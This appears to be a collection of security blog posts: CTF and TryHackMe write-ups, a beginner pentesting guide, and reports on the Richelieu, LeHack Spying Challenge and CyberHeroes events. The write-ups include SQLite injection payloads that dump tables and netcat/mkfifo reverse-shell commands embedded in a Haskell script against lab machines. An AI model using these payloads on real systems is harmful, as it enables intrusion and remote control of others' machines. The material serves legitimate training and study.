Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain set up details because i really think it is useful for any one who would like to play CTF and access a browser when the connexion to the attacking machine is made through ssh.

So this introduction aims to be userful for any CTF or even daily practice at you job.

You will have to use -D et -C while launching the command

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specify the local port you wish to use for forwarding

-C is the Compression

-i to specify the location of the key file 

Then we need to set up burp under the User options tab (it can also be made under Project options, it depends if you wish to keep permanently or just for a specific project).

Then you can configure your browser proxy as it is usually done when you use Burpsuite (note: this picture is of foxyproxy a firefox add on that i would recommend to anyone who happens to work often on webpentest):


For this CTF my team mate CptButtStuff was using proxychains which is an amazing tool to launch a local program.

Here is how to set it up:

Open a new tab and run ssh again as follow using another port than the one you used for burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains conf file /etc/proxychains.conf:

socks5 5555

And then you can launch a program you wish using proxychains (here i am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can i get file from the remote host to my local machine?

You can use scp as follow:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a set up ready (and not only for this chal 😀 ) we can work on 2 of spades

On port 9001 the service was http (see below the extract of my nmap scan)

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first thing that comes in mind with a form is sql injection so i tried this, and got a nice error disclosing plenty of info:

' Union select 1, 2 --

This basically means that we need to try to add another col 

And there we go:

Now that we know that the backend DB is sqlite let’s find cool payloads to dump the database:

Table name enumerationSELECT name FROM sqlite_master WHERE type=’table’
Table schema enumerationSELECT sql FROM sqlite_master WHERE type=’table’
Payload chosen

I used this one and got the schema of the table

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need so now we can query the information we need to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have our flag we just need to wget our png file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png


How to get started with pentesting?

When people ask me about how to get into pentesting, the first i say is that practice is essential. But how to practice pentesting on your own? How to get started with virtual machines?

In this article i am going to explain, how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the website you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentest (it is not realistic but you will get the core techniques used for pentest)

How to get started ?

Create your virtual attacking machine with Kali Linux

  1. Download Virtualbox and install it:  
  2. Download Virtualbox and install it from here  
  3. Download the lastest kali linux virtualbox image (it is going to be our attacker machine) Make sure to take the virtualbox image and not the vmware one:
  1. Install Kali:
  • Go to virtualbox and click on « File » > « Import Appliance… »
  • Click on the yellow folder and navigate to the image of kali you downloaded, select it and click on open
  • Click on next and then click on import. It will take a little while… And then launch it for the first time. Username should be kali and password kali but you can find this info on their website or on the description of your machine in virtualbox
A screenshot of a social media post

Description generated with very high confidence

What website can you use?

Some great starters

First i would recommend to create an account on tryHackMe here, it’s free! Then you will have to download your configuration file and access to the VPN so you can start hacking away on their machines.

What is awesome about tryhackme is that you even have box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will not only be useful on tryhackme but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access our customer system to test).

If you are not familiar with VPN here is a wikipedia article explaining what it is. But simply put you can see a VPN as a tool that will give you access to another computer or environment remotely. TryHackMe and other website for pentesting practice will require a VPN so that you can access your practicing environment, usually a vulnerable machine hack.

If you are not familiar with linux, TryHackMe has a box that explains it very well, you even get a cool badge by completing it! You can also practice on, this website is a wargame you will be able to learn about linux and security concepts. If you want a little more explainations on concepts you should definitely go on linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.

Here is a list of great box (all free) on tryhackmefor beginners:

There are plenty more i really recommend you to have a look around.

Push your skills further with other platforms

You have covered your beginners skills? You want to go further? Here are some useful resources for this.

Writeup – TryHackMe HaskHell

Today i am going to present the write up for HaskHell on TryHackMe.

First of all after having deployed the machine, we can run nmap on the targeted IP.


nmap -p- -sV

Result of Nmap:

kali@kali:~$ nmap -p- -sV -T4
Starting Nmap 7.80 ( ) at 2020-10-11 11:40 EDT
Nmap scan report for
Host is up (0.23s latency).
Not shown: 65533 closed ports
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5001/tcp open  http    Gunicorn 19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds

We can see that port 5001 is http and open.

Let’s have a look at Port 5001

Go to http://<target-ip>:5001

Homepage of the haskell course

If you click on « homework here » you will find a page with an exercise


The link to submit exercise respond with a 404.
Also the following screen shows us that this teacher has already had hacker’s student


This also gives us a huge hint: We can submit a haskell script and it will be interpreted. So let’s try to make a reverse shell.

But first let’s try to execute a command. Here is the documentation to execute a command with haskell: System Process on haskell

Also we need to find where to upload our script, let’s run dirb


Dirb result
The page where we will submit our shell

Okay, now that we know where to put our script. Let’s write it!

Reverse shell with Haskell

I did not know anything about haskell so after some digging i found out that i had to save my script with .hs in the end for it to be recognized and executed by our target.

Also the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if we need (which was really helpful for me)

First i tried a simple ls

#!/bin/env runhaskell
import System.Process

main :: IO ()
main = do
 let stdin' = ""
 (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin'
 putStrLn $ "stdout: " ++ stdout'
 putStrLn $ "stderr: " ++ stderr'
 putStrLn $ "errCode: " ++ show errCode

And i got this:

On we find the following command:

nc -e /bin/sh 1234

So i tried a netcat with the -e option to specify what to do after the nc.
However, there were 2 errors on my case my port 1234 was busy and the netcat command on the target did not handle -e option. Resolving the first error is easy (changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following one:

module Main where 
import System.Process
 main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"

Indeed according to this website, the following command would be handled on the other netcat versions:

#other version of netcat 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8888 >/tmp/f

Do not forget before uploading the script to launch you listener on your attacking machine

nc -lvp 8888

And then we get a shell:

And we can get the user flag:

$ ls
$ cat user.txt

Now that we got user we need to get root. But first let’s find to way to avoid having to connect through our webshell. Let’s try to use ssh. If we navigate to the user .ssh folder we have a key pair.
Let’s try to get those on our attacker machine by running python simple http server.

Then from the attacking machine we can connect through ssh after having set up the proper permission for our private key (700)

To have an interactive shell we can run this:

python -c 'import pty; pty.spawn("/bin/bash")'

And there we go:

Linux enumeration with linepeas:

Let’s upload linepeas in our target machine.

On our kali we run


And then we launch python simple server to put it on the target

And from our target we get it with:

$ wget$ chmod 755$ ./

Linepeas is very good but for this context we could have done a sudo -l before and this would have been it. It is a good habit to try this before doing anything else.

Here is what we get if we run flask:

Trying to run flask

Well it is something very useful. We know that we need to write a script and launch it as root. In my case i did a reverse shell but it can be even easier to just launch a shell with a python command.

Here is the reverse shell i did with a script:

#!/usr/bin/env python
import socket,subprocess,os

We then just have to set up a new listener on our attacker machine:

nc -lvp 8888

Se export our script to our env (target machine)

And we run our script as root from the target machine:

We get a shell from our attacking machine. So let’s run our command to get an interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

We now have the root flag:

Getting root flag

Hackeuse pour la DGSE – Challenge Richelieu

Afin d’étoffer ses équipes la DGSE a organisé un challenge: le Challenge Richelieu.

Pour y accéder, il fallait se rendre sur le site :

Page d’accueil du challenge Richelieu

Et c’est tout! A moi ensuite d’enquêter…

Premier réflexe donc, ouvrir la console web et regarder le code source de la page et là j’ai découvert l’existence d’un fichier PDF:

Code source de la page d’accueil du challenge Richelieu

J’accède au fichier en tapant dans le navigateur à la suite de l’adresse « /Richelieu.pdf » pour ainsi obtenir ce qui semblait être un fichier PDF de 364 pages avec un texte noir sur fond blanc à la première page:

Première page du PDF

Mais comme je ne suis pas dupe j’ai fait une sélection de tout le document:

Sélection sur le PDF

Et bien sur du texte était caché. J’ai donc sélectionné tout le texte et collé dans mon notepad préféré.

En voici un extrait:

/9j/2wBDADIiJSwlHzIsKSw4NTI7S31RS0VFS5ltc1p9tZ++u7Kfr6zI4f/zyNT/16yv+v/9//// ////wfD/////////////wgALCA20CD4BAREA/8QAGQABAQEBAQEAAAAAAAAAAAAAAAECAwQF/9oA CAEBAAAAAeFzUWUsiyzUFlgFgChLKud5lms2KluaLBNZs1neNSaRclSxqWLJ0xYVNQFyusxQlA1M 6iyhNRKQrUpCxKuNJqUEqyywmoIosUgmosZ1nSWxYlzbOYEWFlRZQssFlRUAqWGsgsspc6zZUsqW WWagXNlihKCywVZcrLZLYWLEspYssRalJqEmpTQzqCaSNXNualoEUzKQVQlSiklslFRKOUosLIai UlAChFhYohYCoVc6ksAsLLKSyzeNSakWwlsBSyClipKAlSpZpJSrJRFllKVneUpVzVkVFTUsLCFm kmoiyiWS1c0SyWrOVyssoRUsompYAVLBUqxLKlslhZUqUAJqWCWakqWWazpEtgsazrNlhYsti5qw WLBYWWxYljWRZWpWdJrnbc3UzaSqlSasiTSaJYkprNhYaixE1E05AlslRUsUlqFgssBZZZvBYsWL LNZVKjWbYJVkoubFE1JaRYllUSglJSahYm8ypVlCpYGsakVUq5E3Gue7lTNUsubFShYSoWWGoms6 ksKLnTiWSy2EUhZqShQRZrJYUiywssLLCpSW51C53m5KQqVKsWEsosVKXO8zeLLWaWNZ1JZYWVKs lJbnebnSWoE0lzpBQEhbGksAiy3G2dsyqZtzpmiuIssRSWLLYSgWWak1lYsssLLFJUWWGs2LNQJr OoItiW5WazU1BUCWoq5azSaRNSxrIsCxUbzYJrO83OmkY3Cpc6li5usXRLjZmhQICbxTNLqZ1mxL Y1eFgLJUoRbE0lgKgApc2VBUDWSzWVEqFSypbmhNSy5sqazSVrKoFiwtzZWsrKiakpZUVLKudZ1n 

J’ai reconnu un encodage de base64. J’ai ensuite décodé ce texte et testé un « strings » sur le fichier :

Strings sur le fichier décodé
Résultat de la commande

J’ai ainsi obtenu une liste de fichiers et un mot de passe.

Il y a donc des fichiers inclus dans le PDF. Je vous passe mes recherches approfondies sur les structures des PDF (je vous renvoie vers les liens de fin d’article si vous souhaitez en savoir plus, je vous y invite vivement car c’est passionnant).

Il est également intéressant de noter que si l’on renomme le fichier en jpg on obtient une image:

Renommage du fichier en jpg

Répondant maintenant à la question que l’on est amené à se poser, en tout cas que je me suis posée longuement en ce qui me concerne. Comment dois-je faire pour récupérer les fichiers et les extraire? Il existe un outil très pratique pour ceci: binwalk

Résultat de binwalk

Binwalk affiche tous les fichiers que l’on nous avait promis, c’est bon signe! Je vais pouvoir les extraire grâce à l’option -e

Ici mon fichier s’appelle base64.jpg, binwalk va créer un dossier _base64.extracted et y mettre tout ce qu’il aura pu extraire:

Résultat de binwalk -e

Voici le contenu du dossier créé par binwalk:

Résultat du ls dans le dossier créé par binwalk

J’ai ensuite tenté de dézipper le fichier (le mot de passe du zip est celui trouvé précédemment dans le base64:

Mot de passe
Dézippage du fichier et récupération des fichiers

J’ai donc récupéré les fichiers et leur contenus.

Contenu et taille des fichiers que l’on vient d’extraire

Il est important de noter à cette étape qu’en voyant les fichiers obtenus et leur noms, il m’a semblé que j’allais devoir cracker une clé RSA… Je dispose en effet d’une clé publique « public.key » et d’un étrange fichier « prime.txt ».

Je me suis donc attaquée à la compréhension du .bash_history. En connaissant un peu Linux on peut savoir que le .bash_history contient l’historique des commandes tapées. J’ai donc fait un cat sur le fichier pour savoir ce qui a été tapé pour créer les fichiers.

Cat sur le fichier .bash_history

Je remarque plusieurs utilisation de la commande sed qui fonctionne avec des expressions régulières. Une petite recherche m’a permis d’en savoir plus:

The sed General Syntax

Je comprends que prime.txt est une clé RSA mais qu’elle a été modifiée avec la commande sed.

Voici ce qui a été effectué grâce à sed:

// 7f a été remplacé par fb sur tout le document
 1342  sed -i ‘s/7f/fb/g’ prime.txt

// e1 a été remplacé par 66 sur tout le document 
 1343  sed -i ‘s/e1/66/g’ prime.txt

// f4 a été remplacé par 12 sur tout le document
 1344  sed -i ‘s/f4/12/g’ prime.txt

// 16 a été remplacé par 54 sur tout le document
 1345  sed -i ‘s/16/54/g’ prime.txt

// a4 a été remplacé par 57 sur tout le document
 1346  sed -i ‘s/a4/57/g’ prime.txt

// b5 a été remplacé par cd sur tout le document
 1347  sed -i ‘s/b5/cd/g’ prime.txt

Ici il faudrait donc taper les commandes à l’inverse pour retrouver le fichier d’origine.

Je vais maintenant essayer de comprendre en quoi consiste la commande : openssl rsa -noout -text -in priv.key | grep prime1 -A 18 > prime.txt

Grâce à une recherche j’apprend ceci:


Cette commande permet donc juste d’afficher la clé privé.

J’ai eu quelques difficultés sur cette partie du fait de mon manque de connaissances en cryptographie.

J’ai donc fait des recherches afin de continuer car j’étais curieuse de savoir sur quoi cela allait déboucher. J’ai pu trouver le mot de passe pour décompresser

Ce zip contenait un fichier texte avec des informations nécessaires à la continuation du défi.

Il était possible de se connecter en ssh à un serveur dédié au challenge.

Suite du challenge

On passait ensuite sur la partie Wargame du challenge.

Connexion en ssh au wargame richelieu

J’ai un peu joué avec le défi 1 mais j’ai malheureusement manqué de temps pour finir les défis. En manipulant un peu le défi 1, j’ai compris qu’il s’agit d’un buffer overflow à exploiter.

En effet voici le résultat d’un ls -al :

Commande ls -al

Je n’ai évidemment pas les droits nécessaire pour faire un cat sur « drapeau.txt ». Je sais que je peux exécuter le programme grâce aux droits que j’ai a sur prog.bin : -r-sr-sr-x

Je l’ai donc lancé et j’ai pu m’amuser un moment avec les différentes options… Fun fact: avec l’option 3 j’ai vu devant mes yeux ébahis un petit train qui passait sagement:

Petit train express DGSE

Le principe ici était d’exploiter le buffer overflow pour faire des commandes réservées à root. En effet, j’avais noté la présence du « s » sur le programme prog.bin. Ce « s » permet à l’exécutable d’effectuer des commandes que le propriétaire du fichier aurait pu faire. C’est grâce à ceci que j’ai pu en apprendre plus sur la fameuse attaque: « return oriented programming ». En exploitant cette attaque j’aurais pu essayer de faire faire un cat drapeau.txt par le programme.

Note importante: Grâce à Geluchat sur Twitter j’ai appris que la démarche était bien plus simple que ce que j’imaginais pour le défi 1 du wargame:

Voilà donc mon expérience sur le challenge Richelieu. J’ai beaucoup aimé parce-que j’ai appris énormément sur les pdf et j’ai pu découvrir la return oriented programming attack. Je trouve important de noter que même si l’on ne peut pas ou l’on a pas forcément le temps d’aller au bout des défis on apprend énormément même en y conscrant peu de temps.

Je vous invite donc si vous avez l’occasion à faire le prochain défi proposé par la DGSE, qui sait, vous serez peut-être embauchés!

Pour aller plus loin

Compte rendu de la participation de WoSEC Paris au Spying Challenge de LeHack 2019

Scroll down for english version

Teaser du Spying Challenge de LeHack 2019

Dans le cadre des activités du WoSEC Paris, j’ai créé une équipe de CTF pour le Spying Challenge 2019 de la conférence LeHack à Paris.

Logo du Spying Challenge

Qu’est-ce que le Spying Challenge ?

Pour cette troisième édition lors de « leHACK » et dans un contexte d’intelligence économique omniprésent, vous aurez comme mission de collecter des informations sur un ensemble de cibles avec pour but de satisfaire vos clients floués.

Cette mission fera intervenir des recherches en sources ouvertes, du vishing, de la filature, du social engineering, des intrusions physiques, du lockpicking, etc.

Comment ça marche ?

Une première épreuve de qualification avant « leHACK » permettra de départager les meilleures équipes qui pourront continuer l’expérience. C’est dans un second temps, le 6 juillet, que vous serez dans l’action réelle !


Les phases du Spying Challenge

Phase 1: OSINT, GEOINT, Social Engineering et rapport

Les agents Dupont et Martin ont fait appel à des agences dont WoSEC Paris afin d’enquêter sur une entreprise suspecte, voici l’ordre de mission (mail et PDF joint décrivant l’objectif de la mission) :

Présentation des agentes du WoSEC Paris

Christine Granville aka @Gabrielle_BGB

Agente Granville

Ash aka @asdmhx

Agente Ash

Lucy Elizabeth Smith @catr42

Agente Smith

Pour être sélectionnées, il nous fallait réussir cette phase qui consistait à écrire un rapport documenté sur nos démarches telles que de l’OSINT, du GEOINT et du social engineering par téléphone ou par mail/chat.

Extraits du rapport

Voici le rapport que nous avons soumis aux agents Dupont et Martin:

Voici également l’enregistrement de l’appel de l’agent Ash à Lictor (le lien dans le rapport n’est plus valide):

Mail de sélection pour la phase 2

Nous avons été reçues pour passer aux phases suivantes que je vais ici vous décrire.

Phase 2: Le Spying Challenge Physique à LeHack Paris

Avant de commencer cette phase, nous avons reçu un e-mail avec de plus amples informations sur le déroulement de la mission:

Mail de description de la phase 2

Pour décrire la phase je vais présenter chaque mission qui nous ont été confiées tout au long de la journée.

1. Interagir avec le maximum d’interlocuteurs employés par Lictor afin de récupérer de nouvelles informations sur vos cibles.

Equipées de micros, les agentes ont rapidement repéré le stand de Lictor.

  • Ash portait un t-shirt Spartan et a du aborder Liliana (Ingénieure d’affaire chez Lictor) ;
  • Granville s’est fondue dans la salle pour arriver incognito au stand de Lictor et intéragir avec les différents employés ;
  • Smith joue le rôle de la stagiaire en recherche d’un poste stylé et aborda Lictor pour en savoir plus sur leur actions.

2. Identifier et prendre en photo l’employé Jack Barrel

Opération toujours en cours…

3. 11:35 am Rencontre avec le PDG de Lictor

A cette étape de nouvelles missions (en temps limité) nous ont été confiées:

  • Faire du Social Engineering sur le PDG de Lictor afin d’obtenir plus d’informations sur lui (effectué par l’agente Ash) tout en faisant diversion.
  • Récupérer discrètement le sac du PDG afin d’échanger un CD et de prendre un maximum de photo du contenu du sac (effectuée par agente Smith et agente Granville)

4. Neutralisation et fouille

Lors de cet entretien, on nous a confié les missions suivantes:

  • Les employés de Lictor ayant découvert que l’agent Dupont était sous couverture, ils décidèrent de l’éliminer. Pour les stopper, l’agente Smith eu pour mission d’empoisonner le verre de l’employé chargé de la neutralisation de l’agent Dupont.
  • Une salle suspecte certainement équipée de micro devait être fouillée à l’aide d’un détecteur. La salle étant sous surveillance, il fallait que l’agente Ash fasse diversion afin que l’agente Granville puisse entrer pour fouiller la salle et détecter les micros. Des employés surprirent l’agent Granville pendant sa fouille elle a du utiliser ses talents de persuasion pour ne pas éveiller les soupçons.

5. Filature

Lors de cette phase il était question de suivre les employés de Lictor qui avaient kidnappé Gustave Leproleau. Il s’agissait donc de retrouver l’endroit ou était enfermé Gustave. Les agentes ont procédé à différentes filatures et ont identifié la cachette ou était enfermé Gustave Leproleau.

6. Libérer Gustave

Pour la dernière nous devions libérer Gustave. Toutefois, nos plans ne se passèrent pas comme prévu. En effet une horde de sbires cagoulés et tout de noir vêtu nous ont poursuivi et enfermé séparément.

L’agente Ash et l’agente Granville, furent enfermées dans une salle. Menottée, l’agente Granville utilisa sa pince à cheveux pour se libérer. Les mains liées, l’agente Ash réussit à casser le filament de plastique afin d’ouvrir le coffre fort ou étaient dissimulées des informations TOP SECRÈTES.

Pendant ce temps, l’agente Smith subit un interrogatoire musclé qui ne l’impressionna pas du tout.

Les élites de la France selon l’équipe du Spying Challenge

WoSEC Paris: gagnantes du Spying Challenge 2019, LeHack Paris

Nous avons honoré notre mission en libérant Gustave Leproleau des griffes de cette entreprise peu scrupuleuse.

Agente Smith, Gustave Leproleau, Agente Granville, Agente Ash (sous le beau logo WoSEC)

Classement du top 3:

WoSECParis première place!
SpyKidsIH3 deuxième place
Project BlueBird troisième place

Les Rankings successifs de la journée

Ranking OSINT et phase de SE
Ranking phase 2 (SE, document theft, poisoning and surveillance)
Dernier ranking (lockpicking, lie detector, escape)

Tweet du Spying Challenge sur notre victoire

Write-up officiel de l’équipe WoSEC Paris


Merci à @asdmhx et à @catr42 pour leur enthousiasme et leur détermination!

WoSEC Paris remercie l’équipe du Spying Challenge pour l’organisation de ce palpitant challenge et les mise en situation réaliste lors de LeHack.

L’équipe du Spying Challenge

Merci également à tous les participants du Spying Challenge de nous avoir donné du fil à retordre.

Enfin, un grand merci à LeHack d’hoster un tel évènement.

Report on WoSEC Paris’ participation in the Spying Challenge of LeHack 2019

Teaser of Spying Challenge of LeHack 2019

As part of the activities of WoSEC Paris, I created a CTF team for the Spying Challenge 2019 of LeHack conference in Paris.

Logo du Spying Challenge

What is the Spying Challenge?

For this third edition during the “leHACK” and in a context of omnipresent economic intelligence, you will have the mission to collect information on a set of targets with the aim of satisfying your customers.

This mission will involve open source research, vishing, tracking, social engineering, physical intrusions, lockpicking, etc.

How does it work?

A first qualifying event before “leHACK” will allow to decide between the best teams who will be able to continue the experience. It is in a second time, on July 6, that you will be in the real action!


The phases of the Spying Challenge

Phase 1: OSINT, GEOINT, Social Engineering and report

Agents Dupont and Martin called different agencies including WoSEC Paris to investigate a suspicious company, here is the mission order (email and PDF attached describing the objective of the mission):

Presentation of the agents of WoSEC Paris:

Christine Granville aka @Gabrielle_BGB

Agent Granville

Christine Granville, a social engineering enthusiast, is very persuasive. When she was a baby, she hacked the exit code from her mother’s womb. As a child, lockpicking was her favourite extracurricular activity. Today at the WoSEC Paris agency, nothing can resist her, her two favourite sidekicks (Ash and Lucy Elizabeth) and she are in charge of the most dangerous missions.

Ash aka @asdmhx

Agent Ash

Iron fist in a velvet glove, Ash has always known how to distinguish herself by her taste for fighting and high-risk excursions. Her passions in life: knee breaking and videos of axolotl babies. She recently joined the WoSEC Paris team to use her social engineering skills – and also to learn how to pull the worms out of a source without having it end up in an IKEA kit.

Lucy Elizabeth Smith

Agent Smith

Passionate since her early childhood about puzzles, investigations, coded messages and everything that makes knots in the brain, Lucy decided one day to put her talents at the service of the WoSEC Paris agency.

To be selected, we had to succeed in this phase, which consisted in writing a documented report on our approaches such as OSINT, GEOINT and social engineering by phone or email/chat.

Extract of the report

The report is available only in french

Mail for our qualification for phase 2

We had been qualified to move on to the next phases that I will describe here.

Phase 2: The Physical Spying Challenge at LeHack Paris

Before starting this phase, we received an e-mail with more informations about the mission:

Dear agents,

Reading your report convinced us of your ability to
collect relevant information. Your feedback has allowed us to
make great progress in our investigation of Lictor.
As indicated above, we have therefore decided to keep you on
this mission which will continue on July 6, 2019.

Between 10am and 12pm, you should:

  • Interact with as many people as possible employed by Lictor in order to
    retrieve new information about your targets;

  • Identify and take a picture of employee Jack Barrel (he is strong
    suspicious and only shows up at the stand from time to time);

  • Go to the place indicated in attachments at 11:35 a.m.
    (no delays will be tolerated), where you will have to meet the CEO
    of Lictor, and where you will be informed of your orders for the rest of
    the operation.

If possible, bring back a lockpicking kit, enough to take pictures,
write a report in digital format, and your boldness.
We expect a brief report on your new findings to

PS: Do not follow or interact with targets until it is
wears a cap with the Lictor logo on it (according to our information, the
CEO of Lictor and Jack Barrel will not wear hats: you
will still be able to talk to them).
Similarly, you will only be able to interact with Gustave Leproleau if
when he wears his beret.

PPS: The service apologizes for the late hour, there was a pot.


Agents Dupont and Martin

To describe the phase I will present each mission that was given to us throughout the day.

1. Interact with as many people as possible employed by Lictor to retrieve new informations about your targets.

Equipped with microphones, the agents quickly spotted Lictor’s booth.

  • Ash wore a Spartan t-shirt and had to approach Liliana (Business Engineer at Lictor);
  • Granville melted into the room to arrive incognito at the Lictor booth and interact with the different employees ;
  • Smith played the role of an intern in search of a cool position and came to see at Lictor’s stand to know more about their actions.

2. Identify and take a picture of the employee Jack Barrel

Operation still in progress…

3. 11:35 am Meeting with the CEO of Lictor

At this stage we have been entrusted with new missions (in limited time):

  • Social Engineering on the CEO of Lictor to get more information about him (done by Agent Ash) while diverting.
  • Secretly pick up the CEO’s bag to exchange a CD and take as many pictures as possible of the contents of the bag (done by Agent Smith and Agent Granville)

4. Neutralization and search


Congratulations, your mission continues.
Meet us at 3:15 pm in front of the Lictor stand to receive your instructions.

Agents Dupont and Martin

During this interview, we were given the following tasks:

  • When Lictor’s employees discovered that Agent Dupont was undercover, they decided to eliminate him.
    To stop them, Agent Smith was given the task of poisoning the glass of the employee responsible for Agent Dupont’s neutralisation.
  • A suspicious room certainly equipped with microphones had to be searched with a detector. With the room under surveillance, Officer Ash had to create a diversion so that Officer Granville could enter the room to search the room and detect the microphones. Some employees surprised Agent Granville during her search and she had to use her persuasive skills to avoid arousing suspicion.


Phase 3 of your mission is not complete. We will meet at 4:30 pm at Lictor stand for a final spinning event. You will receive your orders on site.

At the end of this test, a selection will be made and only the
the best agents will participate in the final phase.


Agents Dupont and Martin

During this phase, we had to follow Lictor’s employees who had kidnapped Gustave Leproleau. So it was a matter of finding the place where Gustave was locked up. The officers conducted various surveillance operations and identified the hiding place where Gustave Leproleau was locked up.

6. Releasing Gustave

For the last one we had to free Gustave. However, our plans did not go as planned. Indeed a horde of hooded and black-dressed minions chased us and locked us up separately.
Agent Ash and Agent Granville were locked in a room. Handcuffed, Agent Granville used her hair clip to free herself. With her hands tied, Agent Ash managed to break the plastic filament in order to open the safe in which were concealed TOP SECRET information.

Meanwhile, Agent Smith was subjected to a tough interrogation that did not impress her at all.

France’s elites according to the Spying Challenge team

WoSEC Paris: winners of the Spying Challenge 2019, LeHack Paris

We honoured our mission by freeing Gustave Leproleau from the clutches of this unscrupulous company.

Agent Smith, Gustave Leproleau, Agent Granville and Agent Ash (under the beautiful WoSEC logo)

Top 3 ranking

WoSECParis first place!

SpyKidsIH3 second place

Project BlueBird third place

Rankings of the day

OSINT and SE phase ranking

SE, document theft, poisoning and surveillance ranking

Last ranking (lockpicking, lie detector, escape)

Spying challenge tweet about our victory


Thanks to @asdmhx et à @catr42 for their enthusiasm and commitment!

WoSEC Paris thanks the Spying Challenge team for organizing this exciting challenge and the realistic role-playing during LeHack.

L’équipe du Spying Challenge

Thanks also to all the participants of the Spying Challenge for giving us a hard time.

Finally, a big thank you to LeHack for hosting such an event.

Compte rendu de la rencontre du 27 mars 2019

Cette première rencontre avait pour objectif de présenter les projets de #WoSECParis et de prendre contact avec les participant.e.s.

Le chapitre parisien du WoSEC a été présenté, il a pour objectif de:

  • D’apprendre ensemble le Ethical Hacking par différents biais notamment via des entrainements à des CTF qui pourraient fort probablement déboucher sur la création d’une équipe de CTF majoritairement voire exclusivement féminine.
  • Faire intervenir des personnalités de la Cyber grâce à des conférences
  • De se réunir pour participer à des évènements afin de ne pas se sentir seules.
  • Et bien sûr toutes autres suggestions proposées par les participantes

Après un tour de table de présentation, nous avons décidé que la fréquence des rencontres serait mensuelle avec une préférence pour les mercredis soirs ou jeudis soirs (à partir de 18:30).

Les suggestions des participant.e.s ont été les suivantes:

  • Faire une conférence avec ateliers sur le thème du recrutement
  • Faire intervenir des expert.e.s sur différents sujets
  • Découper les rencontres en deux temps: un temps conférence suivi d’un temps atelier d’entrainement aux CTF.

Il a été précisé que si certaines participantes le souhaitaient des Meetups pourraient être exclusivement féminin. Toutefois, pour le moment aucune demande de cet ordre n’a été formulée.

Il a été décidé de créer un groupe Linkedin pour échanger et s’informer:

Deux nouveaux events ont été créés sur meetup afin d’aller ensemble à des évènements:

CyberHeroes week by Cyberworkplace

During my internship at Radically Open Security, I had the opportunity to help with the building of a CTF made for the CyberHeroes week of Cyberworkplace. I found Cyberworkplace’s initiative so great that I asked if I could volunteer for the CyberHeroes week. Not only did they accepted me as a volunteer, but also as a participant.

What is Cyberworkplace?

Cyberworkplace is a dutch initiative based in Rotterdam. It « is a non-profit initiative that helps reduce the current shortage of cyber security experts in the labor market and provides much-needed 21st-century skills to vulnerable young people (dropouts/ gamers/students, who lack practical experience in their study programs).
The training/lessons given at Cyberworkplace are inspired by modern teaching methods such as peer-to-peer techniques and project-based learning. » (source:

What is CyberHeroes ?

« CyberHeroes is a one-week training program that brings together twenty talented youngsters from The Netherlands and New Mexico, USA. Together they will be trained in ethical hacking skills to address current security threats. Over the course of one week, they will take on hacker battles, work on CSI-type cyber challenges with local police, study the history of cryptography, learn to fight cyber crime alongside international hackers, and much more. » (source: Cyberheroes booklet)

(source: Cyberheroes flickr)

Day 1: Cryptography and lockpicking

(source: cyberheroes booklet)

Philip Zimmerman made a great talk about cryptography and data protection.
He exposed the evolution of the Internet and its impacts on life privacy.

(source: cyberheroes booklet)

(source: Oscar Koeroo’s slides)

Oscar Koeroo started his workshop by a talk about his work at KPN and how they handled security.
On 2012, KPN got hacked, this year they decided to set up a Security Operation Center to handle better such incidents.
KPN CISO Strategy and policy is made available for everyone here
After this introduction, he started explaining cryptography concepts.
He then detailed RSA encryption.
Finally, we practiced RSA encryption and encrypted with our own messages and numbers.
He mentioned a very good tool to help us for the assignments:

(source: Cyberheroes flickr)

We ended the day with lockpicking, now i really want to buy my own lockpicking set! 😀 It reminded me of the video game called Skyrim, except it is much easier with a joystick^^

Day 2: CTF with Radically Open Security

(source: screen of the CTF platform made by Daan Spitz from Radically Open Security)

In the morning, Daan Spitz was introduced and then we started the CTF. Daan works for Radically Open Security who sponsored the event and gave a CTF that he made.
In the afternoon, Melanie Rieback CEO of Radically Open Security was introduced she presented ROS and gave a great demo talk about cracking passwords.
We cracked the password « TreeHouse1234 » in less than 33 seconds!
Demo and slides can be found on ROS’s github.

(source: Cyberheroes flickr)

Day 3: On a boat with the dutch Police

(source: Cyberheroes flickr)

On day 3, we spent all day at the Seaport Police of Rotterdam.
We had the opportunity to meet Dirk-Jan Grootenboer, Peter Duin and other great police officers. They presented the Seaport Police and their work.
The Cyber Resilience unit has different goals:

  • Awareness of cyber threats and risks by citizens, corporations and other organisations
  • Know how to act: reactive, preventive, pro-active
  • Work together to share knowledge and new opportunities offered by technology
  • Resulting in continuous growth of cyber resiliency
  • From cyber security to cyber resilience
  • From reactive to pro active thinking and acting
  • Catching the advantages of cyber with an open eye for the risks

(source: Police officers talk)

